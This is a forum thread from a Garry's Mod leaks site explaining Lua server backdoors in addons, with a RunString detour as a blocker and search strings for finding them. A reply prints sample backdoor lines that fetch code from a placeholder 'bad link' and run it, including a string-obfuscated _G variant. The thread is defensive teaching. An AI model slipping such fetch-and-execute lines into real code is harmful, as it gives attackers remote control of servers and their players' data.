Garry's Mod Leaks

[Info] What are backdoors, how do they work, how do you find them, how to stop them

Submitted by Poggers kekw, , Thread ID: 260436

20-02-2023, 07:06 PM
#1
What Are Backdoors?

Backdoors are a snippet of code that give an attacker full server access to your server.

Why should I care?

Having full server side access can be very harmful Because with server side access attackers can: ruin your economy, get everyone's ips, get all of your addons, put ads outside of clients screens making the attacker money ( this has happened before ), hold you, yourserver, or your files ransom and they can run visuals on your server.

How do they work?

There are many types of backdoors here are some: web panels, web hooks, net strings, and concommands. I'll start with web panels, web panels use an http request to request a page and run code from that page, the thing that makes web panels, web panels is that they can control your server from the website. web hooks are just like web panels, but they inform the attacker with your server name, server password ( if there is one ) and net string. they can't control your server from the web hook ( most the time) but they still have serverside access. net strings are just nets that can run code on the server or run console commands. this requires the attacker to be on the server to run it and they don't get notified if your server runs the backdoor. concommands are malicious console commands that can: give superadmin, unban accounts, give money or ban people. this usually a very beginner tactic.

What does a backdoor look like?

there are 2 types of backdoors: function and global ( this is not actually correct but it's how I sort them ). Function based backdoors are the simplest they use some code executing functions to run and execute code, example: RunString, RunStringEx ( same thing as runstring ), and CompileString. Global based backdoors are a lot harder to find, they use global variables to call all the functions in a table form then call code executing functions from that table. for example: _G calls the global table and to call Runstring from _G you do _G["RunString"]. The thing that makes global based backdoors hard to find is that you call the code executing functions as a string from global. so you can encrypt the string and make it unsearchable. some global variables are: _G, debug.getfenv(), debug.getregistry().


How do i stop them?

Most backdoor blockers use a tactic called "detouring." detouring is when you preserve a vanilla lua function and overwrite that function letting you change it and add code to it while calling the preserved function inside of the overwritten one. example:
Code:
local perserved_runstring = RunString
function RunString(code, identifier, error_handler)
     print(code)
     perserved_runstring(code,identifier,error_handler)
end
this code debugs RunString and prints and code excecuted with it. blockers with search the "code" parameter and check if anything malicious is trying to get through and will not execute the preserved runstring if it is malicious.

How do i find them?

use a program like sublime text or visual studio, drag the leak folder onto the program and right click it and click 'search folder'. there you can search strings to find any function or global based backdoor. here are some strings you can search: RunString, CompileString, http., _G, getfenv, getregistry.




thanks for taking your time to read this informative narrative. please like or +rep me if you found this useful.
This hidden content has been reported as still working 0 times this month.
1 times in total

Lost Programmer
My messages are open, ask me anything!
My Github

RE: [Info] What are backdoors, how do they work, how do you find them, how to stop them

#2
Deam thx for these Information in youre Post that helps very much thx!!!!
Backdoor Buster

RE: [Info] What are backdoors, how do they work, how do you find them, how to stop them

#3
Wow!!!!!!!!!!!!!!!!!!! Never seen something as detailed as this anywhere regarding Backdoors. @Forum Staff pin this on the forum!

RE: [Info] What are backdoors, how do they work, how do you find them, how to stop them

#4
Is http. format is always a backdoor?

RE: [Info] What are backdoors, how do they work, how do you find them, how to stop them

OP
This post was last modified: 05-03-2023, 05:24 PM by Poggers kekw
#5
05-03-2023, 04:41 PM
Celaz Wrote:
Is http. format is always a backdoor?
not always, sometimes it can be an updater or DRM. but there's a really high chance it's a backdoor.
most http backdoors will look like:
Code:
http.Fetch("bad link",function(b) RunString(b,":",false) end)

or

http.Fetch("bad link",RunString)

or

_G["ht".."tp"]["Fe".."tch"]("encry".."pted b".."ad li".."nk",function(b) _G["Run".."String"](b) end)
updaters should look like:
Code:
local file_version = "1"
http.Fetch("update url",function(current_version)
      if current_version != file_version then
             print("outdated")
      end
end)
drms will look like:
Code:
http.Post("drm url",{ key = "licensekey", owner = "7642867276230", addon ="hi ertrw"}, function(content)
      if content == "leaked" then
             print("blocked")
      else
                load(files)
        end
end)

Lost Programmer
My messages are open, ask me anything!
My Github

RE: [Info] What are backdoors, how do they work, how do you find them, how to stop them

This post was last modified: 05-03-2023, 05:56 PM by ertrw
#6
05-03-2023, 05:21 PM
Poggers kekw Wrote:
Code:
http.Post("drm url",{ key = "licensekey", owner = "7642867276230", addon ="hi ertrw"}, function(content)
      if content == "leaked" then
            print("blocked")
      else
                load(files)
        end
end)

yay my name is in there hehe boiii ive got it ^^ btw hi Poggers kekw :D
Backdoor Buster

RE: [Info] What are backdoors, how do they work, how do you find them, how to stop them

#7
The easiest would just be if no backdoor infecected files would be posted but yeah its most of the time pretty easy to remove

RE: [Info] What are backdoors, how do they work, how do you find them, how to stop them

OP
#8
05-03-2023, 06:38 PM
legonleon Wrote:
The easiest would just be if no backdoor infecected files would be posted but yeah its most of the time pretty easy to remove
this would be difficult for nulled, nulled would have to do one of these options: scrape the url and download the zip to check for backdoors, or have their own upload system. scraping the url would be a long hard task for nulled, and it breaks the website they scraped TOS. their own upload system would break tons of copywrite laws and would probably result in the website being seized or a massive lawsuit.

Lost Programmer
My messages are open, ask me anything!
My Github

RE: [Info] What are backdoors, how do they work, how do you find them, how to stop them

#9
One thing that helps, is to see the date that the files were edited, so if you find a file that was edited in a different date than the others, it probably has a backdoor.

RE: [Info] What are backdoors, how do they work, how do you find them, how to stop them

OP
#10
07-03-2023, 01:11 AM
henrique1000 Wrote:
One thing that helps, is to see the date that the files were edited, so if you find a file that was edited in a different date than the others, it probably has a backdoor.
depending on the addon size this would not be worth the time. as well as the actual time gets saved when zipping a file so if the author reposts the zip directly from gms it will show diffrent times even if it wasen't edited.

Lost Programmer
My messages are open, ask me anything!
My Github


Users browsing this thread: 3 Guest(s)